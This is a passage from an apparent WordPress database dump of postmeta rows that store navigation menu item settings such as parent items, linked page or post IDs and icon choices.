enu_item_xfn',''),(42908,3805,'_menu_item_url',''),(42909,3805,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42910,3806,'_menu_item_type','post_type'),(42911,3806,'_menu_item_menu_item_parent','3739'),(42912,3806,'_menu_item_object_id','3040'),(42913,3806,'_menu_item_object','page'),(42914,3806,'_menu_item_target',''),(42915,3806,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42916,3806,'_menu_item_xfn',''),(42917,3806,'_menu_item_url',''),(42918,3806,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42919,3807,'_menu_item_type','post_type'),(42920,3807,'_menu_item_menu_item_parent','3734'),(42921,3807,'_menu_item_object_id','3040'),(42922,3807,'_menu_item_object','page'),(42923,3807,'_menu_item_target',''),(42924,3807,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42925,3807,'_menu_item_xfn',''),(42926,3807,'_menu_item_url',''),(42927,3807,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42928,3808,'_menu_item_type','post_type'),(42929,3808,'_menu_item_menu_item_parent','3729'),(42930,3808,'_menu_item_object_id','3052'),(42931,3808,'_menu_item_object','page'),(42932,3808,'_menu_item_target',''),(42933,3808,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42934,3808,'_menu_item_xfn',''),(42935,3808,'_menu_item_url',''),(42936,3808,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42937,3808,'_menu_item_icon','null'),(42938,3809,'_menu_item_type','post_type'),(42939,3809,'_menu_item_menu_item_parent','3722'),(42940,3809,'_menu_item_object_id','3053'),(42941,3809,'_menu_item_object','page'),(42942,3809,'_menu_item_target',''),(42943,3809,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42944,3809,'_menu_item_xfn',''),(42945,3809,'_menu_item_url',''),(42946,3809,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42947,3809,'_menu_item_icon','null'),(42948,3810,'_menu_item_type','post_type'),(42949,3810,'_menu_item_menu_item_parent','3728'),(42950,3810,'_menu_item_object_id','3053'),(42951,3810,'_menu_item_object','page'),(42952,3810,'_menu_item_target',''),(42953,3810,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42954,3810,'_menu_item_xfn',''),(42955,3810,'_menu_item_url',''),(42956,3810,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42957,3810,'_menu_item_icon','null'),(42958,3811,'_menu_item_type','post_type'),(42959,3811,'_menu_item_menu_item_parent','3739'),(42960,3811,'_menu_item_object_id','3053'),(42961,3811,'_menu_item_object','page'),(42962,3811,'_menu_item_target',''),(42963,3811,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42964,3811,'_menu_item_xfn',''),(42965,3811,'_menu_item_url',''),(42966,3811,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42967,3812,'_menu_item_type','post_type'),(42968,3812,'_menu_item_menu_item_parent','3722'),(42969,3812,'_menu_item_object_id','3055'),(42970,3812,'_menu_item_object','page'),(42971,3812,'_menu_item_target',''),(42972,3812,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42973,3812,'_menu_item_xfn',''),(42974,3812,'_menu_item_url',''),(42975,3812,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42976,3812,'_menu_item_icon','null'),(42977,3813,'_menu_item_type','post_type'),(42978,3813,'_menu_item_menu_item_parent','3728'),(42979,3813,'_menu_item_object_id','3055'),(42980,3813,'_menu_item_object','page'),(42981,3813,'_menu_item_target',''),(42982,3813,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42983,3813,'_menu_item_xfn',''),(42984,3813,'_menu_item_url',''),(42985,3813,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42986,3813,'_menu_item_icon','null'),(42987,3814,'_menu_item_type','post_type'),(42988,3814,'_menu_item_menu_item_parent','3728'),(42989,3814,'_menu_item_object_id','3441'),(42990,3814,'_menu_item_object','page'),(42991,3814,'_menu_item_target',''),(42992,3814,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42993,3814,'_menu_item_xfn',''),(42994,3814,'_menu_item_url',''),(42995,3814,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42996,3814,'_menu_item_icon','null'),(42997,3815,'_menu_item_type','post_type'),(42998,3815,'_menu_item_menu_item_parent','3722'),(42999,3815,'_menu_item_object_id','3441'),(43000,3815,'_menu_item_object','page'),(43001,3815,'_menu_item_target',''),(43002,3815,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43003,3815,'_menu_item_xfn',''),(43004,3815,'_menu_item_url',''),(43005,3815,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43006,3815,'_menu_item_icon','null'),(43007,3816,'_menu_item_type','post_type'),(43008,3816,'_menu_item_menu_item_parent','3729'),(43009,3816,'_menu_item_object_id','3054'),(43010,3816,'_menu_item_object','page'),(43011,3816,'_menu_item_target',''),(43012,3816,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43013,3816,'_menu_item_xfn',''),(43014,3816,'_menu_item_url',''),(43015,3816,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43016,3816,'_menu_item_icon','null'),(43017,3817,'_menu_item_type','post_type'),(43018,3817,'_menu_item_menu_item_parent','3729'),(43019,3817,'_menu_item_object_id','3057'),(43020,3817,'_menu_item_object','page'),(43021,3817,'_menu_item_target',''),(43022,3817,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43023,3817,'_menu_item_xfn',''),(43024,3817,'_menu_item_url',''),(43025,3817,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43026,3817,'_menu_item_icon','null'),(43027,3818,'_menu_item_type','post_type'),(43028,3818,'_menu_item_menu_item_parent','3729'),(43029,3818,'_menu_item_object_id','3058'),(43030,3818,'_menu_item_object','page'),(43031,3818,'_menu_item_target',''),(43032,3818,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43033,3818,'_menu_item_xfn',''),(43034,3818,'_menu_item_url',''),(43035,3818,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43036,3818,'_menu_item_icon','null'),(43037,3819,'_menu_item_type','post_type'),(43038,3819,'_menu_item_menu_item_parent','3729'),(43039,3819,'_menu_item_object_id','3059'),(43040,3819,'_menu_item_object','page'),(43041,3819,'_menu_item_target',''),(43042,3819,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43043,3819,'_menu_item_xfn',''),(43044,3819,'_menu_item_url',''),(43045,3819,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43046,3819,'_menu_item_icon','null'),(43047,3820,'_menu_item_type','post_type'),(43048,3820,'_menu_item_menu_item_parent','3728'),(43049,3820,'_menu_item_object_id','3060'),(43050,3820,'_menu_item_object','page'),(43051,3820,'_menu_item_target',''),(43052,3820,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43053,3820,'_menu_item_xfn',''),(43054,3820,'_menu_item_url',''),(43055,3820,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43056,3820,'_menu_item_icon','null'),(43057,3821,'_menu_item_type','post_type'),(43058,3821,'_menu_item_menu_item_parent','3722'),(43059,3821,'_menu_item_object_id','3060'),(43060,3821,'_menu_item_object','page'),(43061,3821,'_menu_item_target',''),(43062,3821,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43063,3821,'_menu_item_xfn',''),(43064,3821,'_menu_item_url',''),(43065,3821,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43066,3821,'_menu_item_icon','null'),(43067,3822,'_menu_item_type','post_type'),(43068,3822,'_menu_item_menu_item_parent','3734'),(43069,3822,'_menu_item_object_id','3060'),(43070,3822,'_menu_item_object','page'),(43071,3822,'_menu_item_target',''),(43072,3822,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43073,3822,'_menu_item_xfn',''),(43074,3822,'_menu_item_url',''),(43075,3822,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43076,3823,'_menu_item_type','post_type'),(43077,3823,'_menu_item_menu_item_parent','3763'),(43078,3823,'_menu_item_object_id','3067'),(43079,3823,'_menu_item_object','page'),(43080,3823,'_menu_item_target',''),(43081,3823,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43082,3823,'_menu_item_xfn',''),(43083,3823,'_menu_item_url',''),(43084,3823,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43085,3823,'_menu_item_icon','null'),(43086,3824,'_menu_item_type','post_type'),(43087,3824,'_menu_item_menu_item_parent','3763'),(43088,3824,'_menu_item_object_id','3066'),(43089,3824,'_menu_item_object','page'),(43090,3824,'_menu_item_target',''),(43091,3824,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43092,3824,'_menu_item_xfn',''),(43093,3824,'_menu_item_url',''),(43094,3824,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43095,3824,'_menu_item_icon','null'),(43096,3825,'_menu_item_type','post_type'),(43097,3825,'_menu_item_menu_item_parent','3763'),(43098,3825,'_menu_item_object_id','3065'),(43099,3825,'_menu_item_object','page'),(43100,3825,'_menu_item_target',''),(43101,3825,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43102,3825,'_menu_item_xfn',''),(43103,3825,'_menu_item_url',''),(43104,3825,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43105,3825,'_menu_item_icon','null'),(43106,3826,'_menu_item_type','post_type'),(43107,3826,'_menu_item_menu_item_parent','3759'),(43108,3826,'_menu_item_object_id','3077'),(43109,3826,'_menu_item_object','portfolio-item'),(43110,3826,'_menu_item_target',''),(43111,3826,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43112,3826,'_menu_item_xfn',''),(43113,3826,'_menu_item_url',''),(43114,3826,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43115,3826,'_menu_item_icon','null'),(43116,3827,'_menu_item_type','post_type'),(43117,3827,'_menu_item_menu_item_parent','3759'),(43118,3827,'_menu_item_object_id','3076'),(43119,3827,'_menu_item_object','portfolio-item'),(43120,3827,'_menu_item_target',''),(43121,3827,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43122,3827,'_menu_item_xfn',''),(43123,3827,'_menu_item_url',''),(43124,3827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43125,3827,'_menu_item_icon','null'),(43126,3828,'_menu_item_type','post_type'),(43127,3828,'_menu_item_menu_item_parent','3759'),(43128,3828,'_menu_item_object_id','3075'),(43129,3828,'_menu_item_object','portfolio-item'),(43130,3828,'_menu_item_target',''),(43131,3828,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43132,3828,'_menu_item_xfn',''),(43133,3828,'_menu_item_url',''),(43134,3828,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43135,3828,'_menu_item_icon','null'),(43136,3829,'_menu_item_type','post_type'),(43137,3829,'_menu_item_menu_item_parent','3759'),(43138,3829,'_menu_item_object_id','3098'),(43139,3829,'_menu_item_object','portfolio-item'),(43140,3829,'_menu_item_target',''),(43141,3829,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43142,3829,'_menu_item_xfn',''),(43143,3829,'_menu_item_url',''),(43144,3829,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43145,3829,'_menu_item_icon','null'),(43146,3830,'_menu_item_type','post_type'),(43147,3830,'_menu_item_menu_item_parent','3728'),(43148,3830,'_menu_item_object_id','3068'),(43149,3830,'_menu_item_object','page'),(43150,3830,'_menu_item_target',''),(43151,3830,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43152,3830,'_menu_item_xfn',''),(43153,3830,'_menu_item_url',''),(43154,3830,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43155,3830,'_menu_item_icon','null'),(43156,3831,'_menu_item_type','post_type'),(43157,3831,'_menu_item_menu_item_parent','3722'),(43158,3831,'_menu_item_object_id','3068'),(43159,3831,'_menu_item_object','page'),(43160,3831,'_menu_item_target',''),(43161,3831,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43162,3831,'_menu_item_xfn',''),(43163,3831,'_menu_item_url',''),(43164,3831,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43165,3831,'_menu_item_icon','null'),(43166,3832,'_menu_item_type','post_type'),(43167,3832,'_menu_item_menu_item_parent','3751'),(43168,3832,'_menu_item_object_id','3071'),(43169,3832,'_menu_item_object','page'),(43170,3832,'_menu_item_target',''),(43171,3832,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43172,3832,'_menu_item_xfn',''),(43173,3832,'_menu_item_url',''),(43174,3832,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43175,3832,'_menu_item_icon','null'),(43176,3833,'_menu_item_type','post_type'),(43177,3833,'_menu_item_menu_item_parent','3754'),(43178,3833,'_menu_item_object_id','3070'),(43179,3833,'_menu_item_object','page'),(43180,3833,'_menu_item_target',''),(43181,3833,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43182,3833,'_menu_item_xfn',''),(43183,3833,'_menu_item_url',''),(43184,3833,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43185,3833,'_menu_item_icon','null'),(43186,3834,'_menu_item_type','post_type'),(43187,3834,'_menu_item_menu_item_parent','3754'),(43188,3834,'_menu_item_object_id','3069'),(43189,3834,'_menu_item_object','page'),(43190,3834,'_menu_item_target',''),(43191,3834,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43192,3834,'_menu_item_xfn',''),(43193,3834,'_menu_item_url',''),(43194,3834,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43195,3834,'_menu_item_icon','null'),(43196,3835,'_menu_item_type','post_type'),(43197,3835,'_menu_item_menu_item_parent','3755'),(43198,3835,'_menu_item_object_id','3071'),(43199,3835,'_menu_item_object','page'),(43200,3835,'_menu_item_target',''),(43201,3835,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43202,3835,'_menu_item_xfn',''),(43203,3835,'_menu_item_url',''),(43204,3835,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43205,3835,'_menu_item_icon','null'),(43206,3836,'_menu_item_type','post_type'),(43207,3836,'_menu_item_menu_item_parent','3758'),(43208,3836,'_menu_item_object_id','3070'),(43209,3836,'_menu_item_object','page'),(43210,3836,'_menu_item_target',''),(43211,3836,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43212,3836,'_menu_item_xfn',''),(43213,3836,'_menu_item_url',''),(43214,3836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43215,3836,'_menu_item_icon','null'),(43216,3837,'_menu_item_type','post_type'),(43217,3837,'_menu_item_menu_item_parent','3758'),(43218,3837,'_menu_item_object_id','3069'),(43219,3837,'_menu_item_object','page'),(43220,3837,'_menu_item_target',''),(43221,3837,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43222,3837,'_menu_item_xfn',''),(43223,3837,'_menu_item_url',''),(43224,3837,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43225,3837,'_menu_item_icon','null'),(43226,3838,'_menu_item_type','post_type'),(43227,3838,'_menu_item_menu_item_parent','3755'),(43228,3838,'_menu_item_object_id','3072'),(43229,3838,'_menu_item_object','page'),(43230,3838,'_menu_item_target',''),(43231,3838,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43232,3838,'_menu_item_xfn',''),(43233,3838,'_menu_item_url',''),(43234,3838,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43235,3838,'_menu_item_icon','null'),(43236,3839,'_menu_item_type','post_type'),(43237,3839,'_menu_item_menu_item_parent','3751'),(43238,3839,'_menu_item_object_id','3072'),(43239,3839,'_menu_item_object','page'),(43240,3839,'_menu_item_target',''),(43241,3839,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43242,3839,'_menu_item_xfn',''),(43243,3839,'_menu_item_url',''),(43244,3839,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43245,3839,'_menu_item_icon','null'),(43246,3840,'_menu_item_type','post_type'),(43247,3840,'_menu_item_menu_item_parent','3751'),(43248,3840,'_menu_item_object_id','1382'),(43249,3840,'_menu_item_object','page'),(43250,3840,'_menu_item_target',''),(43251,3840,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43252,3840,'_menu_item_xfn',''),(43253,3840,'_menu_item_url',''),(43254,3840,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43255,3840,'_menu_item_icon','null'),(43256,3841,'_menu_item_type','post_type'),(43257,3841,'_menu_item_menu_item_parent','3755'),(43258,3841,'_menu_item_object_id','1382'),(43259,3841,'_menu_item_object','page'),(43260,3841,'_menu_item_target',''),(43261,3841,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43262,3841,'_menu_item_xfn',''),(43263,3841,'_menu_item_url',''),(43264,3841,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43265,3841,'_menu_item_icon','null'),(43266,3842,'_menu_item_type','post_type'),(43267,3842,'_menu_item_menu_item_parent','3757'),(43268,3842,'_menu_item_object_id','1393'),(43269,3842,'_menu_item_object','page'),(43270,3842,'_menu_item_target',''),(43271,3842,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43272,3842,'_menu_item_xfn',''),(43273,3842,'_menu_item_url',''),(43274,3842,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43275,3842,'_menu_item_icon','null'),(43276,3843,'_menu_item_type','post_type'),(43277,3843,'_menu_item_menu_item_parent','3756'),(43278,3843,'_menu_item_object_id','1650'),(43279,3843,'_menu_item_object','page'),(43280,3843,'_menu_item_target',''),(43281,3843,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43282,3843,'_menu_item_xfn',''),(43283,3843,'_menu_item_url',''),(43284,3843,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43285,3843,'_menu_item_icon','null'),(43286,3844,'_menu_item_type','post_type'),(43287,3844,'_menu_item_menu_item_parent','3757'),(43288,3844,'_menu_item_object_id','1642'),(43289,3844,'_menu_item_object','page'),(43290,3844,'_menu_item_target',''),(43291,3844,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43292,3844,'_menu_item_xfn',''),(43293,3844,'_menu_item_url',''),(43294,3844,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43295,3844,'_menu_item_icon','null'),(43296,3845,'_menu_item_type','post_type'),(43297,3845,'_menu_item_menu_item_parent','3752'),(43298,3845,'_menu_item_object_id','1650'),(43299,3845,'_menu_item_object','page'),(43300,3845,'_menu_item_target',''),(43301,3845,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43302,3845,'_menu_item_xfn',''),(43303,3845,'_menu_item_url',''),(43304,3845,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43305,3845,'_menu_item_icon','null'),(43306,3846,'_menu_item_type','post_type'),(43307,3846,'_menu_item_menu_item_parent','3753'),(43308,3846,'_menu_item_object_id','1642'),(43309,3846,'_menu_item_object','page'),(43310,3846,'_menu_item_target',''),(43311,3846,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43312,3846,'_menu_item_xfn',''),(43313,3846,'_menu_item_url',''),(43314,3846,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43315,3846,'_menu_item_icon','null'),(43316,3847,'_menu_item_type','post_type'),(43317,3847,'_menu_item_menu_item_parent','3753'),(43318,3847,'_menu_item_object_id','1393'),(43319,3847,'_menu_item_object','page'),(43320,3847,'_menu_item_target',''),(43321,3847,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43322,3847,'_menu_item_xfn',''),(43323,3847,'_menu_item_url',''),(43324,3847,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43325,3847,'_menu_item_icon','null'),(43326,3848,'_menu_item_type','post_type'),(43327,3848,'_menu_item_menu_item_parent','3752'),(43328,3848,'_menu_item_object_id','1658'),(43329,3848,'_menu_item_object','page'),(43330,3848,'_menu_item_target',''),(43331,3848,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43332,3848,'_menu_item_xfn',''),(43333,3848,'_menu_item_url',''),(43334,3848,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43335,3848,'_menu_item_icon','icon-star'),(43336,3848,'_menu_item_icon_pack','simple_line_icons'),(43337,3849,'_menu_item_type','post_type'),(43338,3849,'_menu_item_menu_item_parent','3756'),(43339,3849,'_menu_item_object_id','1658'),(43340,3849,'_menu_item_object','page'),(43341,3849,'_menu_item_target',''),(43342,3849,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43343,3849,'_menu_item_xfn',''),(43344,3849,'_menu_item_url',''),(43345,3849,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43346,3849,'_menu_item_icon','icon-star'),(43347,3849,'_menu_item_icon_pack','simple_line_icons'),(43348,3850,'_menu_item_type','post_type'),(43349,3850,'_menu_item_menu_item_parent','3755'),(43350,3850,'_menu_item_object_id','1662'),(43351,3850,'_menu_item_object','page'),(43352,3850,'_menu_item_target',''),(43353,3850,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43354,3850,'_menu_item_xfn',''),(43355,3850,'_menu_item_url',''),(43356,3850,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43357,3850,'_menu_item_icon','null'),(43358,3851,'_menu_item_type','post_type'),(43359,3851,'_menu_item_menu_item_parent','3751'),(43360,3851,'_menu_item_object_id','1662'),(43361,3851,'_menu_item_object','page'),(43362,3851,'_menu_item_target',''),(43363,3851,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43364,3851,'_menu_item_xfn',''),(43365,3851,'_menu_item_url',''),(43366,3851,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43367,3851,'_menu_item_icon','null'),(43368,3852,'_menu_item_type','post_type'),(43369,3852,'_menu_item_menu_item_parent','3752'),(43370,3852,'_menu_item_object_id','1722'),(43371,3852,'_menu_item_object','page'),(43372,3852,'_menu_item_target',''),(43373,3852,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43374,3852,'_menu_item_xfn',''),(43375,3852,'_menu_item_url',''),(43376,3852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43377,3852,'_menu_item_icon','icon-star'),(43378,3852,'_menu_item_icon_pack','simple_line_icons'),(43379,3853,'_menu_item_type','post_type'),(43380,3853,'_menu_item_menu_item_parent','3756'),(43381,3853,'_menu_item_object_id','1722'),(43382,3853,'_menu_item_object','page'),(43383,3853,'_menu_item_target',''),(43384,3853,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43385,3853,'_menu_item_xfn',''),(43386,3853,'_menu_item_url',''),(43387,3853,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43388,3853,'_menu_item_icon','icon-star'),(43389,3853,'_menu_item_icon_pack','simple_line_icons'),(43390,3854,'_menu_item_type','post_type'),(43391,3854,'_menu_item_menu_item_parent','3755'),(43392,3854,'_menu_item_object_id','3073'),(43393,3854,'_menu_item_object','page'),(43394,3854,'_menu_item_target',''),(43395,3854,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43396,3854,'_menu_item_xfn',''),(43397,3854,'_menu_item_url',''),(43398,3854,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43399,3854,'_menu_item_icon','null'),(43400,3855,'_menu_item_type','post_type'),(43401,3855,'_menu_item_menu_item_parent','3757'),(43402,3855,'_menu_item_object_id','1734'),(43403,3855,'_menu_item_object','page'),(43404,3855,'_menu_item_target',''),(43405,3855,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43406,3855,'_menu_item_xfn',''),(43407,3855,'_menu_item_url',''),(43408,3855,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43409,3855,'_menu_item_icon','null'),(43410,3856,'_menu_item_type','post_type'),(43411,3856,'_menu_item_menu_item_parent','3751'),(43412,3856,'_menu_item_object_id','3073'),(43413,3856,'_menu_item_object','page'),(43414,3856,'_menu_item_target',''),(43415,3856,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43416,3856,'_menu_item_xfn',''),(43417,3856,'_menu_item_url',''),(43418,3856,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43419,3856,'_menu_item_icon','null'),(43420,3857,'_menu_item_type','post_type'),(43421,3857,'_menu_item_menu_item_parent','3753'),(43422,3857,'_menu_item_object_id','1734'),(43423,3857,'_menu_item_object','page'),(43424,3857,'_menu_item_target',''),(43425,3857,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43426,3857,'_menu_item_xfn',''),(43427,3857,'_menu_item_url',''),(43428,3857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43429,3857,'_menu_item_icon','null'),(43430,3858,'_menu_item_type','post_type'),(43431,3858,'_menu_item_menu_item_parent','3724'),(43432,3858,'_menu_item_object_id','1679'),(43433,3858,'_menu_item_object','page'),(43434,3858,'_menu_item_target',''),(43435,3858,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43436,3858,'_menu_item_xfn',''),(43437,3858,'_menu_item_url',''),(43438,3858,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43439,3858,'_menu_item_icon','null'),(43440,3859,'_menu_item_type','post_type'),(43441,3859,'_menu_item_menu_item_parent','3761'),(43442,3859,'_menu_item_object_id','3770'),(43443,3859,'_menu_item_object','post'),(43444,3859,'_menu_item_target',''),(43445,3859,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43446,3859,'_menu_item_xfn',''),(43447,3859,'_menu_item_url',''),(43448,3859,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43449,3859,'_menu_item_icon','null'),(43450,3860,'_menu_item_type','post_type'),(43451,3860,'_menu_item_menu_item_parent','3761'),(43452,3860,'_menu_item_object_id','1685'),(43453,3860,'_menu_item_object','post'),(43454,3860,'_menu_item_target',''),(43455,3860,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43456,3860,'_menu_item_xfn',''),(43457,3860,'_menu_item_url',''),(43458,3860,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43459,3860,'_menu_item_icon','null'),(43460,3861,'_menu_item_type','post_type'),(43461,3861,'_menu_item_menu_item_parent','3761'),(43462,3861,'_menu_item_object_id','1677'),(43463,3861,'_menu_item_object','post'),(43464,3861,'_menu_item_target',''),(43465,3861,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43466,3861,'_menu_item_xfn',''),(43467,3861,'_menu_item_url',''),(43468,3861,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43469,3861,'_menu_item_icon','null'),(43470,3862,'_menu_item_type','post_type'),(43471,3862,'_menu_item_menu_item_parent','3761'),(43472,3862,'_menu_item_object_id','1671'),(43473,3862,'_menu_item_object','post'),(43474,3862,'_menu_item_target',''),(43475,3862,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43476,3862,'_menu_item_xfn',''),(43477,3862,'_menu_item_url',''),(43478,3862,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43479,3862,'_menu_item_icon','null'),(43480,3863,'_menu_item_type','post_type'),(43481,3863,'_menu_item_menu_item_parent','3761'),(43482,3863,'_menu_item_object_id','1670'),(43483,3863,'_menu_item_object','post'),(43484,3863,'_menu_item_target',''),(43485,3863,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43486,3863,'_menu_item_xfn',''),(43487,3863,'_menu_item_url',''),(43488,3863,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43489,3863,'_menu_item_icon','null'),(43490,3864,'_menu_item_type','post_type'),(43491,3864,'_menu_item_menu_item_parent','3761'),(43492,3864,'_menu_item_object_id','1681'),(43493,3864,'_menu_item_object','post'),(43494,3864,'_menu_item_target',''),(43495,3864,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43496,3864,'_menu_item_xfn',''),(43497,3864,'_menu_item_url',''),(43498,3864,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43499,3864,'_menu_item_icon','null'),(43500,3865,'_menu_item_type','post_type'),(43501,3865,'_menu_item_menu_item_parent','3752'),(43502,3865,'_menu_item_object_id','1742'),(43503,3865,'_menu_item_object','page'),(43504,3865,'_menu_item_target',''),(43505,3865,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43506,3865,'_menu_item_xfn',''),(43507,3865,'_menu_item_url',''),(43508,3865,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43509,3865,'_menu_item_icon','null'),(43510,3866,'_menu_item_type','post_type'),(43511,3866,'_menu_item_menu